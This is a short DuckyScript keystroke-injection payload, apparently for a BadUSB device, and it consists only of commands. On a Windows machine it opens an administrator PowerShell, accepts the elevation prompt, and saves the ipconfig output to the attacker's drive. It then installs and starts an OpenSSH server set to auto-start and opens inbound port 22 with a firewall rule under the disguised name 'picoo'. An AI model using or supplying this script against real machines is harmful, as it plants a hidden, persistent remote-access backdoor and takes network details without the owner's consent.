DELAY 100
GUI x
DELAY 500
STRING a
DELAY 500
LEFT_ARROW
DELAY 500
ENTER
DELAY 500
STRING ipconfig > F:/ip.txt
DELAY 200
ENTER
DELAY 500
STRING start-process powershell -verb runas
ENTER
DELAY 100
STRING Get-WindowsCapability -Online | ? Name -like 'OpenSSH*'
ENTER
DELAY 100
STRING Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
ENTER
DELAY 2000
STRING Start-Service sshd
ENTER
DELAY 100
STRING Set-Service -Name sshd -StartupType 'Automatic'
ENTER
DELAY 100
STRING New-NetFirewallRule -Name sshd -DisplayName 'picoo' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22
ENTER
DELAY 500
ALT F4
ALT F4

